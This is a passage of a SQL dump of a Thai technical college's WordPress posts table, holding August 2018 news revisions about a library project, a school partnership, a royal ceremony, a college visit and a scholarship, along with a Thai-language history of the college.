'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3740, 3, '2018-08-14 11:32:09', '2018-08-14 04:32:09', '<a href=\"https://www.facebook.com/media/set/?set=ms.c.eJxFVdmtZTEI62hE2Om~%3BsdEx~_L5PKwSMcUiGWMu4inil~%3B8vF0lnP7fB7DSzJ88V6~_InifiyefNGZMzKL3Z~_KmL9aXDPfeWks7nofzrCLfxVmWeWHVTtLnujhzA9L9OVz~%3BeLdWa8a5358HPzMyW9ef~%3BFaVy9dvvrdVy8U9fP0mNT34Si5fLP19eqHyJffyCdj4~%3B3iR7deXr1Igz75WD~_~_~_~%3BrIJxKY~%3BYb45j8~_JdC33~%3BWbBT3bgzhR~%3BwXjc~_OP38jqreQTgn6dfBLnTb4VyOfGfAl~_Msdv7OOvw3wd~%3BsWb3bzjGfIX9XLokyGsh3zvL9~%3BbfLwfq1cdv9j~_kv2NQ4~_o4XyBk~%3B6LKehJvcsL~%3Biv6MdePQT9OrT53ngL~_0ce~%3Be~%3Bnxfu795v00~_E3vfUwb~_rWkH7xx~%3Bx1uGehJ~%3B~%3Bagng7qucjq~_ajn9OcH7X0fLm8~_f8WMEWOeItfvlCG~_f~_8N~%3BrZ3fuos8Bnqo4F55~%3BGvhh~%3BKOV936NPHv976hf6tze~%3BMXyGrN99Tw~_~_P76~%3ByrZ847wLWJlbBexPug9z3NjcPb~_hTUnzv8EexX~%3B~%3Bm8~_0LYtl45vdAPhfm833f9Gs75ptFv63~%3BlP6LB38Z30~%3BAv2b0z8Tqy3m0rb9Yf7799vlV6QeDHuRbs~%3Bob98Pe773v8lZfo7791t~%3BUIxr5lPx736Oxv3yz~_5r1eudHvSds~_cfW01y~%3B6flN4c8YOz4G~%3BeP85uIP~_8Gd8Y1~_1fXid3~%3BEL583zisPP8Tbu3g1~_E9HDu8~_M943wfuMKNYDnx9~%3B2~%3BcX7~_4b9IiuZj9bP6~_~_K84r7~%3Bxr~%3Betn5s5l~_wvW9~_3nEQ~%3B20dOLN~%3Bwn0UX~_u~_9u37hoKfg~_xtcgnv1bbv3meSC~_7Refe67kL8B2~%3BH3~%3BO2mn~%3Bssnj48H5nt~_82~%3By6If9695X3vf1h1Nf3~%3B9D0lgP~%3Bihnf5o7v18~_6JXU6~%3Bvpv33l~%3BK8G~_z~_M~_wz7Lt8Y92Ht~_eUXR7z3O6zI3~_xHFPxDnHjzke8TnLtyv~_7~%3BL5yXrJ~_bfpbGvnySrI~%3B~_nH6S1cOZX2Lr~%3Bfgk3ttjPRn4oZL9wA~%3B56AdZPdyuv5cK~%3BSa5D7BvSti~%3BAbcyfveXvOB9vH8LYtt9Muy~%3B8N8k553yvY~_el8SYb3AfpdSe139~_~%3Bhnj.bps.a.650421052000753&type=1\"><img class=\"aligncenter wp-image-3649 size-full\" src=\"/wp-content/uploads/2018/08/10-8-2561-9-59-57-1.jpg\" alt=\"\" width=\"451\" height=\"606\" /></a>', 'On Wednesday 8th August 2018 at Rayong Technical college, the Library project for the academic year of 2018 took place. This was set up for students to learn how to garner research from books and increase their literacy and love for books.', '', 'inherit', 'closed', 'closed', '', '3648-revision-v1', '', '', '2018-08-14 11:32:09', '2018-08-14 04:32:09', '', 3648, 'http://www.technicrayong.ac.th/3648-revision-v1/', 0, 'revision', '', 0),
(3741, 3, '2018-08-14 11:33:40', '2018-08-14 04:33:40', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D650369615339230%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Wednesday 8th August 2018, The Memorandum of Understanding (MOU) a cooperation of academic studies between Rayong Technical College and Wat Ta-Kien Ngam Community School was reached by The Director’s Mrs. Uncharee Sansuwun and education staffs of Wat Ta-Kien Ngam Community School and learned about Bai Khalu herb (Indian marsh fleabane) cosmetic curriculum, professional skills development project, and basic education in Entrepreneurship.', '', 'inherit', 'closed', 'closed', '', '3637-autosave-v1', '', '', '2018-08-14 11:33:40', '2018-08-14 04:33:40', '', 3637, 'http://www.technicrayong.ac.th/3637-autosave-v1/', 0, 'revision', '', 0),
(3742, 3, '2018-08-14 11:33:27', '2018-08-14 04:33:27', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D650369615339230%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Wednesday 8th August 2018, The Memorandum of Understanding (MOU) a cooperation of academic studies between Rayong Technical College and Wat Ta-Kien Ngam Community School was reached by The Director’s Mrs. Uncharee Sansuwun and education staffs of Wat Ta-Kien Ngam Community School and learned about Bai Khalu herb (Indian marsh fleabane) cosmetic curriculum, professional skills development project, and basic education in Entrepreneurship.', '', 'inherit', 'closed', 'closed', '', '3637-revision-v1', '', '', '2018-08-14 11:33:27', '2018-08-14 04:33:27', '', 3637, 'http://www.technicrayong.ac.th/3637-revision-v1/', 0, 'revision', '', 0),
(3749, 2, '2018-08-14 12:09:05', '2018-08-14 05:09:05', '', 'S__5062722', '', 'inherit', 'closed', 'closed', '', 's__5062722', '', '', '2018-08-14 12:09:05', '2018-08-14 05:09:05', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/S__5062722.jpg', 0, 'attachment', 'image/jpeg', 0),
(3757, 2, '2018-08-14 12:40:42', '2018-08-14 05:40:42', 'ไทย', 'Test ระบบถ่ายทอดสด', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2018-08-14 12:40:42', '2018-08-14 05:40:42', '', 160, 'http://www.technicrayong.ac.th/160-revision-v1/', 0, 'revision', '', 0),
(3760, 2, '2018-08-14 12:45:27', '2018-08-14 05:45:27', '', 'RTC R-Radio Network', '', 'inherit', 'closed', 'closed', '', '3617-autosave-v1', '', '', '2018-08-14 12:45:27', '2018-08-14 05:45:27', '', 3617, 'http://www.technicrayong.ac.th/3617-autosave-v1/', 0, 'revision', '', 0),
(3769, 3, '2018-08-14 13:02:52', '0000-00-00 00:00:00', '', 'On Friday 10th August 2018, students and teachers pay their respects to blessed Queen Sirikit in front of her photo in extol ceremony for her at the multi-purpose dome in Rayong Technical College. Queen Sirikit turned 86 years old on August 12.', '', 'draft', 'closed', 'open', '', '', '', '', '2018-08-14 13:02:52', '2018-08-14 06:02:52', '', 0, 'http://www.technicrayong.ac.th/?p=3769', 341, 'post', '', 0),
(3770, 3, '2018-08-14 14:12:11', '2018-08-14 07:12:11', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.652347671808091.1073742186.100010985913485%26type%3D3&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 10th August 2018, students and teachers pay their respects to blessed Queen Sirikit in front of her photo in extol ceremony for her at the multi-purpose dome in Rayong Technical College. Queen Sirikit turned 86 years old on August 12.', '', 'publish', 'closed', 'open', '', 'on-friday-10th-august-2018-students-and-teachers-pay-their-respects-to-blessed-queen-sirikit-in-front-of-her-photo-in-extol-ceremony-for-her-at-the-multi-purpose-dome-in-rayong-technical-college-que', '', '', '2018-08-14 14:12:11', '2018-08-14 07:12:11', '', 0, 'http://www.technicrayong.ac.th/?p=3770', 339, 'post', '', 0),
(3772, 3, '2018-08-14 13:06:59', '2018-08-14 06:06:59', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.652347671808091.1073742186.100010985913485%26type%3D3&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 10th August 2018, students and teachers pay their respects to blessed Queen Sirikit in front of her photo in extol ceremony for her at the multi-purpose dome in Rayong Technical College. Queen Sirikit turned 86 years old on August 12.', '', 'inherit', 'closed', 'closed', '', '3770-revision-v1', '', '', '2018-08-14 13:06:59', '2018-08-14 06:06:59', '', 3770, 'http://www.technicrayong.ac.th/3770-revision-v1/', 0, 'revision', '', 0),
(3773, 3, '2018-08-14 14:10:08', '0000-00-00 00:00:00', '', 'On Friday 10th August 2018, students and teachers pay their respects to blessed Queen Sirikit in front of her photo in extol ceremony for her at the multi-purpose dome in Rayong Technical College. Queen Sirikit turned 86 years old on August 12.', '', 'draft', 'closed', 'open', '', '', '', '', '2018-08-14 14:10:08', '2018-08-14 07:10:08', '', 0, 'http://www.technicrayong.ac.th/?p=3773', 340, 'post', '', 0),
(3775, 3, '2018-08-14 14:10:59', '2018-08-14 07:10:59', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.652347671808091.1073742186.100010985913485%26type%3D3&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๑๐ สิงหาคม ๒๕๖๑ ร่วมถวายพระพรชัยมงคลต่อหน้าพระบรมฉายาลักษณ์ พิธีเฉลิมพระเกียรติสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ ในรัชกาลที่ ๙ เนื่องในวันเฉลิมพระชนมพรรษา ๘๖ พรรษา ๑๒ สิงหาคม ๒๕๖๑ ณ ลานโดมเอนกประสงค์ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3692-autosave-v1', '', '', '2018-08-14 14:10:59', '2018-08-14 07:10:59', '', 3692, 'http://www.technicrayong.ac.th/3692-autosave-v1/', 0, 'revision', '', 0),
(3776, 3, '2018-08-14 14:12:23', '2018-08-14 07:12:23', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.652347671808091.1073742186.100010985913485%26type%3D3&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 10th August 2018, students and teachers pay their respects to blessed Queen Sirikit in front of her photo in extol ceremony for her at the multi-purpose dome in Rayong Technical College. Queen Sirikit turned 86 years old on August 12.', '', 'inherit', 'closed', 'closed', '', '3770-autosave-v1', '', '', '2018-08-14 14:12:23', '2018-08-14 07:12:23', '', 3770, 'http://www.technicrayong.ac.th/3770-autosave-v1/', 0, 'revision', '', 0),
(3778, 3, '2018-08-14 14:39:13', '2018-08-14 07:39:13', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><b>ประวัติวิทยาลัยเทคนิคระยอง</b></span></h2>\r\n<h4><span style=\"color: #808080;\"><b>สถาน</b><b>ที่ตั้ง </b><b> </b>วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000</span></h4>\r\n<h4><span style=\"color: #ffffff;\">000000000<span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0</span>โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717</span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</span></h4>\r\n<h4><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b> <i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</span></h4>\r\n<h4><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b><i>ในปีพ.ศ.2501</i> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน</span></h4>\r\n<h2><span style=\"color: #808080;\"><b>การจัดการศึกษา</b></span></h2>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2481</i></b> เปิดการสอนระดับอาชีวศึกษาชั้นต้น หลักสูตร 3 ปี รับผู้จบประโยคประถมศึกษา(ป.4) </span><span style=\"color: #808080;\">เข้าเรียนแผนกช่างไม้ และมีนักเรียนรุ่นแรก 34 คน </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2485</i></b><b> </b> เปิดสอนแผนกช่างตัดผม หลักสูตร 2 ปี แล้วยุบไป เพราะไม่มีนักเรียนสมัครเข้าเรียน </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2492</i></b><b> </b>เปิดสอนแผนกช่างตัดผมครั้งที่ 2 และขยายห้องเรียนแผนกช่างไม้ ปีที่ 1 เพิ่มเป็น 3 ห้องเรียน</span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2493 </i></b>ยุบแผนกช่างตัดผมเป็นครั้งที่ 2 </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2496 </i></b>ขยายการศึกษาถึงระดับมัธยมศึกษาตอนปลาย รับผู้จบชั้นมัธยมอาชีวศึกษาตอนต้นและรับผู้จบชั้นมัธยมปีที่ 3 สายสามัญ หลักสูตร 3 ปี แผนกช่างไม้ปลูกสร้าง </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2500 </i></b>เปิดสอนระดับมัธยมอาชีวศึกษาตอนปลาย แผนกช่างยนต์ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2503 </i></b>เปิดสอนระดับอาชีวะชั้นสูง แผนกช่างไม้ปลูกสร้าง และยุบแผนกช่างยนต์ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2506 </i></b>เปิดสอนแผนกช่างยนต์ครั้งที่ 2 เปิดสอนระดับมัธยมศึกษาตอนปลาย (ม.4-6) สายอาชีพ แผนกช่างก่อสร้าง </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2513 </i></b>เปิดสอนระดับมัธยมศึกษาตอนปลาย แผนกช่างเชื่อมโลหะแผ่น </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2519</i></b> เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างกลโรงงาน </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2520 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างไฟฟ้า </span></h4>\r\n<h4 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px;\"><span style=\"color: #808080;\"><b><i>พ.ศ.2522 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกพณิชยการ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2524 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคอุตสาหกรรมปิโตรเคมี </span><span style=\"color: #808080;\">แผนกเทคนิคปฏิบัติการ เป็นหลักสูตร 2 ปี รับผู้จบมัธยมศึกษาตอนปลาย (มศ.5) สายวิทยาศาสตร์ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2527</i></b> <b> </b>เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาการบัญชี สาขาเทคโนโลยี</span><span style=\"color: #808080;\">คหกรรมศาสตร์ และสาขาเทคนิคยานยนต์ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2532 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคเคมีอุตสาหกรรม</span><span style=\"color: #808080;\">เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) สาขาช่างอิเล็กทรอนิกส์ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2533</i></b> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาการตลาด และสาขาวิชาเครื่องมือวัดและควบคุมในอุตสาหกรรม </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2534</i></b> <b> </b>เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) ตามโครงการช่างฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2535</i></b> <b> </b>เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาช่างอิเล็กทรอนิกส์ </span><span style=\"color: #808080;\">สาขางานอิเล็กทรอนิกส์อุตสาหกรรม เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) </span><span style=\"color: #808080;\">ตามโครงการฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2537</i></b> <b> </b>เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) 7 สาขา คือ สาขาวิชาช่างเทคนิค</span><span style=\"color: #808080;\">การผลิต สาขางานเครื่องกล สาขาช่างเทคนิคโลหะการ สาขางานเทคนิคงานเชื่อมอุตสาหกรรม สาขา</span><span style=\"color: #808080;\">วิชาช่างไฟฟ้ากำลัง สาขางานติดตั้งและควบคุม สาขาวิชาช่างก่อสร้าง สาขางานเทคนิคการก่อสร้าง สาขาวิชาคหกรรมธุรกิจ สาขาวิชาอาหารและโภชนาการ สาขาวิชาผ้าและเครื่องแต่งกาย</span></h4>\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n<h2><b>สภาพชุมชน</b></h2>\r\n<h4><span style=\"color: #ffffff;\">000000</span><i>สภาพเศรษฐกิจของจังหวัดระยอง </i>เป็นแหล่งท่องเที่ยวเพราะมีความงามของธรรมชาติ เป็นแหล่งผลิตอาหารทะเล เป็นแหล่งปลูกผลไม้เมืองร้อนที่มีคุณภาพ และเป็นที่ตั้งของโครงการพัฒนาพื้นที่ชายฝั่งทะเลตะวันออก ซึ่งเป็นเขตเศรษฐกิจแห่งใหม่ของประเทศ</h4>\r\n<h4><i><span style=\"color: #ffffff;\">000000</span>วิทยาลัยเทคนิคระยอง</i> ตั้งอยู่ใกล้สถานที่ราชการ คือ โรงเรียนประจำจังหวัด ที่ว่าการอำเภอเมือง สำนักงานเขตพื้นที่การศึกษาสำนักงานที่ดินจังหวัด ชุมชนสัมฤทธิ์ ชุมชนมุสลิมปากคลอง ชุมชนทางไผ่ มีอาชีพค้าขายขนาดเล็ก รับจ้าง และทำสวนมะม่วง พุทรา ประมง แพปลา สภาพเศรษฐกิจปานกลาง ชุมชนมีความสัมพันธ์กับวิทยาลัยค่อนข้างดี และมีส่วนร่วมในการบริหารจัดการสถานศึกษา</h4>\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-08-14 14:39:13', '2018-08-14 07:39:13', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3779, 3, '2018-08-14 14:41:53', '2018-08-14 07:41:53', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652456421797216%26id%3D100010985913485&width=500\" width=\"500\" height=\"819\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 10 สิงหาคม 2561 วิทยาลัยพาณิชยการอินทราชัย สถาบันการอาชีวศึกษากรุงเทพมหานคร สังกัดสำนักงานคณะกรรมการการอาชีวศึกษา เข้าศึกษาดูงานศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษา ภายใต้การอบรมเชิงปฏิบัติการตามโครงการพัฒนาศักยภาพนักเรียน นักศึกษา เพื่อเตรียมความพร้อมในการเป็นผู้ประกอบการ (การศึกษาดูงาน) ประจำปีการศึกษา 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3696-autosave-v1', '', '', '2018-08-14 14:41:53', '2018-08-14 07:41:53', '', 3696, 'http://www.technicrayong.ac.th/3696-autosave-v1/', 0, 'revision', '', 0),
(3780, 3, '2018-08-14 14:42:46', '2018-08-14 07:42:46', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652456421797216%26id%3D100010985913485&width=500\" width=\"500\" height=\"819\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 10th August 2018, Intrachai Commercial College, an Institute of Vocational Education of Bangkok and affiliated with the Office of the Vocational Education Commission visited to learn about the incubator operator’s vocational service. This is a workshop that follows Students Ability Development’s project to prepare them to be entrepreneurial for the academic year of 2018 at Rayong technical college.', '', 'publish', 'closed', 'open', '', 'on-friday-10th-august-2018-intrachai-commercial-college-an-institute-of-vocational-education-of-bangkok-and-affiliated-with-the-office-of-the-vocational-education-commission-visited-to-learn-about-t', '', '', '2018-08-14 14:42:46', '2018-08-14 07:42:46', '', 0, 'http://www.technicrayong.ac.th/?p=3780', 338, 'post', '', 0),
(3781, 3, '2018-08-14 14:42:46', '2018-08-14 07:42:46', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652456421797216%26id%3D100010985913485&width=500\" width=\"500\" height=\"819\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 10th August 2018, Intrachai Commercial College, an Institute of Vocational Education of Bangkok and affiliated with the Office of the Vocational Education Commission visited to learn about the incubator operator’s vocational service. This is a workshop that follows Students Ability Development’s project to prepare them to be entrepreneurial for the academic year of 2018 at Rayong technical college.', '', 'inherit', 'closed', 'closed', '', '3780-revision-v1', '', '', '2018-08-14 14:42:46', '2018-08-14 07:42:46', '', 3780, 'http://www.technicrayong.ac.th/3780-revision-v1/', 0, 'revision', '', 0),
(3782, 3, '2018-08-14 14:42:57', '2018-08-14 07:42:57', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652456421797216%26id%3D100010985913485&width=500\" width=\"500\" height=\"819\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 10th August 2018, Intrachai Commercial College, an Institute of Vocational Education of Bangkok and affiliated with the Office of the Vocational Education Commission visited to learn about the incubator operator’s vocational service. This is a workshop that follows Students Ability Development’s project to prepare them to be entrepreneurial for the academic year of 2018 at Rayong technical college.', '', 'inherit', 'closed', 'closed', '', '3780-autosave-v1', '', '', '2018-08-14 14:42:57', '2018-08-14 07:42:57', '', 3780, 'http://www.technicrayong.ac.th/3780-autosave-v1/', 0, 'revision', '', 0),
(3783, 3, '2018-08-14 14:43:36', '2018-08-14 07:43:36', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652487545127437%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 10 สิงหาคม 2561 คุณวิเชียร แสงวงศ์กิจ บริษัท ส.กิจชัย กรุ๊ป มอบทุนสนับสนุนการศึกษา จำนวน 20,000 บาท ให้แก่นักเรียน นักศึกษา ที่เป็นตัวแทนของวิทยาลัยเทคนิคระยอง ไปแข่งขันกีฬาอาชีวเกมส์ ระดับชาติ ณ บริษัท ส.กิจชัย กรุ๊ป', '', 'inherit', 'closed', 'closed', '', '3699-autosave-v1', '', '', '2018-08-14 14:43:36', '2018-08-14 07:43:36', '', 3699, 'http://www.technicrayong.ac.th/3699-autosave-v1/', 0, 'revision', '', 0),
